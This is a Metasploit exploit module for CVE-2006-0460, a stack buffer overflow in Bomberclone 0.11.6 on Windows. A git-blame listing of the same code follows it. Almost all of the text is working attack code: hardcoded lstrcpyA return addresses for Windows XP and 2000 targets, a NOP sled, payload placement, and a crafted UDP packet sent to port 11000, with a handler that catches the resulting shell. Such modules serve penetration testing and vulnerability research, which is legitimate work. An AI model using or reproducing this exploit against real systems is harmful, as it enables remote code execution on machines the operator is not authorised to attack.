modules/exploits/windows/misc/bomberclone_overflow.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::Udp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Bomberclone 0.11.6 Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in Bomberclone 0.11.6 for Windows.
        The return address is overwritten with lstrcpyA memory address,
        the second and third value are the destination buffer,
        the fourth value is the source address of our buffer in the stack.
        This exploit is like a return in libc.

        ATTENTION
        The shellcode is exec ONLY when someone try to close bomberclone.
      },
      'Author'         => 'Jacopo Cervini <acaro[at]jervus.it>',
      'References'     =>
        [
          ['CVE', '2006-0460'],
          ['OSVDB', '23263'],
          ['BID', '16697']
        ],
      'Payload'        =>
        {
          'Space'    => 344,
          'BadChars' => "\x00"
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          ['Windows XP SP2 Italian',   { 'Ret' => 0x7c80c729, } ], # kernel32!lstrcpyA
          ['Windows 2000 SP1 English', { 'Ret' => 0x77e85f08, } ], # kernel32!lstrcpyA
          ['Windows 2000 SP1 English', { 'Ret' => 0x77e95e8b, } ], # kernel32!lstrcpyA
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Feb 16 2006'
      ))

    register_options([ Opt::RPORT(11000) ])
  end

  def exploit
    connect_udp

    pattern  = make_nops(421)
    pattern << payload.encoded
    pattern << [ target.ret ].pack('V')
    pattern << "\x04\xec\xfd\x7f" * 2
    pattern << "\xa4\xfa\x22\x00"

    request  = "\x00\x00\x00\x00\x38\x03\x41" + pattern + "\r\n"

    print_status("Trying #{target.name} using lstrcpyA address at #{"0x%.8x" % target.ret }...")

    udp_sock.put(request)
    udp_sock.get(5)

    handler(udp_sock)
    disconnect_udp
  end
end
Adding an Id tag and a standard header to all modules 2007-02-18 00:10:39 +00:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat 2013-10-15 13:50:46 -05:00			`# Current source: https://github.com/rapid7/metasploit-framework`
Adding an Id tag and a standard header to all modules 2007-02-18 00:10:39 +00:00			`##`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Exploit::Remote`
Retab modules 2013-08-30 16:28:54 -05:00			`Rank = AverageRanking`
ported, untested 2006-12-28 06:17:56 +00:00
Retab modules 2013-08-30 16:28:54 -05:00			`include Msf::Exploit::Remote::Udp`
ported, untested 2006-12-28 06:17:56 +00:00
Retab modules 2013-08-30 16:28:54 -05:00			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'Bomberclone 0.11.6 Buffer Overflow',`
			`'Description' => %q{`
			`This module exploits a stack buffer overflow in Bomberclone 0.11.6 for Windows.`
			`The return address is overwritten with lstrcpyA memory address,`
			`the second and third value are the destination buffer,`
			`the fourth value is the source address of our buffer in the stack.`
			`This exploit is like a return in libc.`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00
Retab modules 2013-08-30 16:28:54 -05:00			`ATTENTION`
			`The shellcode is exec ONLY when someone try to close bomberclone.`
			`},`
			`'Author' => 'Jacopo Cervini <acaro[at]jervus.it>',`
			`'References' =>`
			`[`
			`['CVE', '2006-0460'],`
Revert "Land #6812 , remove broken OSVDB references" 2016-07-15 12:00:31 -05:00			`['OSVDB', '23263'],`
Remove bad references (dead links) 2015-10-27 12:41:32 -05:00			`['BID', '16697']`
Retab modules 2013-08-30 16:28:54 -05:00			`],`
			`'Payload' =>`
			`{`
			`'Space' => 344,`
			`'BadChars' => "\x00"`
			`},`
			`'Platform' => 'win',`
			`'Targets' =>`
			`[`
			`['Windows XP SP2 Italian', { 'Ret' => 0x7c80c729, } ], # kernel32!lstrcpyA`
			`['Windows 2000 SP1 English', { 'Ret' => 0x77e85f08, } ], # kernel32!lstrcpyA`
			`['Windows 2000 SP1 English', { 'Ret' => 0x77e95e8b, } ], # kernel32!lstrcpyA`
			`],`
			`'Privileged' => false,`
			`'DisclosureDate' => 'Feb 16 2006'`
			`))`
ported, untested 2006-12-28 06:17:56 +00:00
Fix msf/core and self.class msftidy warnings 2017-05-03 15:42:21 -05:00			`register_options([ Opt::RPORT(11000) ])`
Retab modules 2013-08-30 16:28:54 -05:00			`end`
ported, untested 2006-12-28 06:17:56 +00:00
Retab modules 2013-08-30 16:28:54 -05:00			`def exploit`
			`connect_udp`
ported, untested 2006-12-28 06:17:56 +00:00
Retab modules 2013-08-30 16:28:54 -05:00			`pattern = make_nops(421)`
			`pattern << payload.encoded`
			`pattern << [ target.ret ].pack('V')`
			`pattern << "\x04\xec\xfd\x7f" * 2`
			`pattern << "\xa4\xfa\x22\x00"`
ported, untested 2006-12-28 06:17:56 +00:00
Retab modules 2013-08-30 16:28:54 -05:00			`request = "\x00\x00\x00\x00\x38\x03\x41" + pattern + "\r\n"`
ported, untested 2006-12-28 06:17:56 +00:00
Retab modules 2013-08-30 16:28:54 -05:00			`print_status("Trying #{target.name} using lstrcpyA address at #{"0x%.8x" % target.ret }...")`
ported, untested 2006-12-28 06:17:56 +00:00
Retab modules 2013-08-30 16:28:54 -05:00			`udp_sock.put(request)`
Fix msftidy and tweak a few modules missing timeouts 2014-06-30 00:46:28 -05:00			`udp_sock.get(5)`
ported, untested 2006-12-28 06:17:56 +00:00
Retab modules 2013-08-30 16:28:54 -05:00			`handler(udp_sock)`
			`disconnect_udp`
			`end`
More osvdb references from Steve Tornio 2009-05-13 17:39:42 +00:00			`end`